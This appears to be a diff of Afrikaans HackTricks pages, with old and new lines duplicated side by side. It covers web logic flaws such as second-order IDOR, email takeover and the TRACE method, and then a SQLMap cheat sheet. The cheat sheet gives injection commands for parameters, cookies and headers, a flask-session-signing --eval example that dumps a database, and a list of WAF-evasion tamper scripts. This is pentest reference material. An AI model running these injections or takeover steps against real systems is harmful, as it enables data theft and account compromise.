As jy egter **die toets slaag** en jou sessie daardie "True" waarde in die sekuriteitsattribuut toegeken word, kan jy probeer om **toegang te verkry tot ander hulpbronne** wat **afhang van dieselfde attribuut** maar waarvoor jy **nie toestemming behoort te hê nie**. [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a). As jy egter **die toets slaag** en jou sessie daardie "Waar" waarde in die sekuriteitsattribuut toegeken word, kan jy probeer om **toegang te verkry tot ander hulpbronne** wat **afhang van dieselfde attribuut** maar waarvoor jy **nie toestemming behoort te hê nie**. [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a).
### Registreer funksionaliteit ### Registreer funksionaliteit
Probeer om te registreer as 'n reeds bestaande gebruiker. Probeer ook om ekwivalente karakters te gebruik (punte, baie spasie en Unicode). Probeer om te registreer as 'n reeds bestaande gebruiker. Probeer ook om ekwivalente karakters te gebruik (punte, baie spasie en Unicode).
### Neem oor e-posse ### Neem e-pos oor
Registreer 'n e-pos, voordat jy dit bevestig, verander die e-pos, dan, as die nuwe bevestigings e-pos na die eerste geregistreerde e-pos gestuur word, kan jy enige e-pos oorneem. Of as jy die tweede e-pos kan aktiveer wat die eerste een bevestig, kan jy ook enige rekening oorneem. Registreer 'n e-pos, voordat jy dit bevestig, verander die e-pos, dan, as die nuwe bevestigings e-pos na die eerste geregistreerde e-pos gestuur word, kan jy enige e-pos oorneem. Of as jy die tweede e-pos kan aktiveer wat die eerste een bevestig, kan jy ook enige rekening oorneem.
@ -48,14 +48,14 @@ Registreer 'n e-pos, voordat jy dit bevestig, verander die e-pos, dan, as die nu
### TRACE metode ### TRACE metode
Ontwikkelaars mag vergeet om verskeie foutopsporing opsies in die produksie-omgewing te deaktiveer. Byvoorbeeld, die HTTP `TRACE` metode is ontwerp vir diagnostiese doeleindes. As dit geaktiveer is, sal die webbediener op versoeke wat die `TRACE` metode gebruik, reageer deur die presiese versoek wat ontvang is in die antwoord te herhaal. Hierdie gedrag is dikwels onskadelik, maar lei soms tot inligtingsontsluiting, soos die naam van interne verifikasie koppe wat aan versoeke deur omgekeerde proxies kan bygevoeg word.![Image for post](https://miro.medium.com/max/60/1\*wDFRADTOd9Tj63xucenvAA.png?q=20) Ontwikkelaars mag vergeet om verskeie foutopsporing opsies in die produksie-omgewing te deaktiveer. Byvoorbeeld, die HTTP `TRACE` metode is ontwerp vir diagnostiese doeleindes. As dit geaktiveer is, sal die webbediener op versoeke wat die `TRACE` metode gebruik, reageer deur die presiese versoek wat ontvang is in die antwoord te herhaal. Hierdie gedrag is dikwels onskadelik, maar lei soms tot inligtingsontsluiting, soos die naam van interne verifikasie koppe wat aan versoeke deur omgekeerde proxies bygevoeg kan word.![Image for post](https://miro.medium.com/max/60/1\*wDFRADTOd9Tj63xucenvAA.png?q=20)
![Image for post](https://miro.medium.com/max/1330/1\*wDFRADTOd9Tj63xucenvAA.png) ![Image for post](https://miro.medium.com/max/1330/1\*wDFRADTOd9Tj63xucenvAA.png)
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer tyd te gee om dieper te delf, shells te pop en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer tyd te gee om dieper te delf, shells te pop, en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

View file

@ -1,4 +1,4 @@
# SQLMap - Cheat Sheet # SQLMap - Cheatsheet
{% hint style="success" %} {% hint style="success" %}
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\ Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
@ -15,9 +15,9 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="../../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -78,7 +78,7 @@ sqlmap -u "http://example.com/?id=*" -p id
```bash ```bash
sqlmap -u "http://example.com" --data "username=*&password=*" sqlmap -u "http://example.com" --data "username=*&password=*"
``` ```
### Inspuitings in Headers en ander HTTP Metodes ### Injekties in Headers en ander HTTP Metodes
```bash ```bash
#Inside cookie #Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*" sqlmap -u "http://example.com" --cookie "mycookies=*"
@ -98,7 +98,7 @@ sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
``` ```
### Eval ### Eval
**Sqlmap** laat die gebruik van `-e` of `--eval` toe om elke payload te verwerk voordat dit met 'n python oneliner gestuur word. Dit maak dit baie maklik en vinnig om die payload op pasgemaakte maniere te verwerk voordat dit gestuur word. In die volgende voorbeeld is die **flask cookie session** **onderteken deur flask met die bekende geheim voordat dit gestuur word**: **Sqlmap** laat die gebruik van `-e` of `--eval` toe om elke payload te verwerk voordat dit met 'n python oneliner gestuur word. Dit maak dit baie maklik en vinnig om die payload op pasgemaakte maniere te verwerk voordat dit gestuur word. In die volgende voorbeeld is die **flask koekie sessie** **onderteken deur flask met die bekende geheim voordat dit gestuur word**:
```bash ```bash
sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump
``` ```
@ -162,13 +162,13 @@ Onthou dat **jy jou eie tamper in python kan skep** en dit is baie eenvoudig. Jy
| base64encode.py | Base64 al karakters in 'n gegewe payload | | base64encode.py | Base64 al karakters in 'n gegewe payload |
| between.py | Vervang groter as operator ('>') met 'NOT BETWEEN 0 AND #' | | between.py | Vervang groter as operator ('>') met 'NOT BETWEEN 0 AND #' |
| bluecoat.py | Vervang spasie karakter na SQL verklaring met 'n geldige willekeurige leë karakter. Vervang daarna karakter = met LIKE operator | | bluecoat.py | Vervang spasie karakter na SQL verklaring met 'n geldige willekeurige leë karakter. Vervang daarna karakter = met LIKE operator |
| chardoubleencode.py | Dubbel url-encode al karakters in 'n gegewe payload (nie reeds geënkodeerde verwerk) | | chardoubleencode.py | Dubbel url-encode al karakters in 'n gegewe payload (nie reeds geënkodeerde verwerk nie) |
| commalesslimit.py | Vervang voorbeelde soos 'LIMIT M, N' met 'LIMIT N OFFSET M' | | commalesslimit.py | Vervang voorbeelde soos 'LIMIT M, N' met 'LIMIT N OFFSET M' |
| commalessmid.py | Vervang voorbeelde soos 'MID(A, B, C)' met 'MID(A FROM B FOR C)' | | commalessmid.py | Vervang voorbeelde soos 'MID(A, B, C)' met 'MID(A FROM B FOR C)' |
| concat2concatws.py | Vervang voorbeelde soos 'CONCAT(A, B)' met 'CONCAT\_WS(MID(CHAR(0), 0, 0), A, B)' | | concat2concatws.py | Vervang voorbeelde soos 'CONCAT(A, B)' met 'CONCAT\_WS(MID(CHAR(0), 0, 0), A, B)' |
| charencode.py | Url-encode al karakters in 'n gegewe payload (nie reeds geënkodeerde verwerk) | | charencode.py | Url-encode al karakters in 'n gegewe payload (nie reeds geënkodeerde verwerk nie) |
| charunicodeencode.py | Unicode-url-encode nie-geënkodeerde karakters in 'n gegewe payload (nie reeds geënkodeerde verwerk). "%u0022" | | charunicodeencode.py | Unicode-url-encode nie-geënkodeerde karakters in 'n gegewe payload (nie reeds geënkodeerde verwerk nie). "%u0022" |
| charunicodeescape.py | Unicode-url-encode nie-geënkodeerde karakters in 'n gegewe payload (nie reeds geënkodeerde verwerk). "\u0022" | | charunicodeescape.py | Unicode-url-encode nie-geënkodeerde karakters in 'n gegewe payload (nie reeds geënkodeerde verwerk nie). "\u0022" |
| equaltolike.py | Vervang al voorkomste van operator gelyk ('=') met operator 'LIKE' | | equaltolike.py | Vervang al voorkomste van operator gelyk ('=') met operator 'LIKE' |
| escapequotes.py | Skuil aanhalings (' en ") | | escapequotes.py | Skuil aanhalings (' en ") |
| greatest.py | Vervang groter as operator ('>') met 'GREATEST' teenhanger | | greatest.py | Vervang groter as operator ('>') met 'GREATEST' teenhanger |
@ -177,9 +177,9 @@ Onthou dat **jy jou eie tamper in python kan skep** en dit is baie eenvoudig. Jy
| modsecurityversioned.py | Omhels volledige navraag met geversioneerde kommentaar | | modsecurityversioned.py | Omhels volledige navraag met geversioneerde kommentaar |
| modsecurityzeroversioned.py | Omhels volledige navraag met nul-geversioneerde kommentaar | | modsecurityzeroversioned.py | Omhels volledige navraag met nul-geversioneerde kommentaar |
| multiplespaces.py | Voeg meerdere spasies rondom SQL sleutelwoorde by | | multiplespaces.py | Voeg meerdere spasies rondom SQL sleutelwoorde by |
| nonrecursivereplacement.py | Vervang vooraf gedefinieerde SQL sleutelwoorde met verteenwoordigings geskik vir vervanging (bv. .replace("SELECT", "")) filters | | nonrecursivereplacement.py | Vervang vooraf gedefinieerde SQL sleutelwoorde met voorstellings geskik vir vervanging (bv. .replace("SELECT", "")) filters |
| percentage.py | Voeg 'n persentasieteken ('%') voor elke karakter by | | percentage.py | Voeg 'n persentasieteken ('%') voor elke karakter by |
| overlongutf8.py | Converteer al karakters in 'n gegewe payload (nie reeds geënkodeerde verwerk) | | overlongutf8.py | Converteer al karakters in 'n gegewe payload (nie reeds geënkodeerde verwerk nie) |
| randomcase.py | Vervang elke sleutelwoord karakter met willekeurige kaswaarde | | randomcase.py | Vervang elke sleutelwoord karakter met willekeurige kaswaarde |
| randomcomments.py | Voeg willekeurige kommentaar by SQL sleutelwoorde | | randomcomments.py | Voeg willekeurige kommentaar by SQL sleutelwoorde |
| securesphere.py | Voeg spesiaal saamgestelde string by | | securesphere.py | Voeg spesiaal saamgestelde string by |
@ -201,9 +201,9 @@ Onthou dat **jy jou eie tamper in python kan skep** en dit is baie eenvoudig. Jy
| varnish.py | Voeg 'n HTTP kop 'X-originating-IP' by | | varnish.py | Voeg 'n HTTP kop 'X-originating-IP' by |
| versionedkeywords.py | Omhels elke nie-funksie sleutelwoord met geversioneerde MySQL kommentaar | | versionedkeywords.py | Omhels elke nie-funksie sleutelwoord met geversioneerde MySQL kommentaar |
| versionedmorekeywords.py | Omhels elke sleutelwoord met geversioneerde MySQL kommentaar | | versionedmorekeywords.py | Omhels elke sleutelwoord met geversioneerde MySQL kommentaar |
| xforwardedfor.py | Voeg 'n vals HTTP kop 'X-Forwarded-For' by | | xforwardedfor.py | Voeg 'n valse HTTP kop 'X-Forwarded-For' by |
<figure><img src="../../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Dadelijk beskikbare opstelling vir kwesbaarheid assessering & pentesting**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle terug 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê. **Dadelijk beskikbare opstelling vir kwesbaarheid assessering & pentesting**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle terug 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê.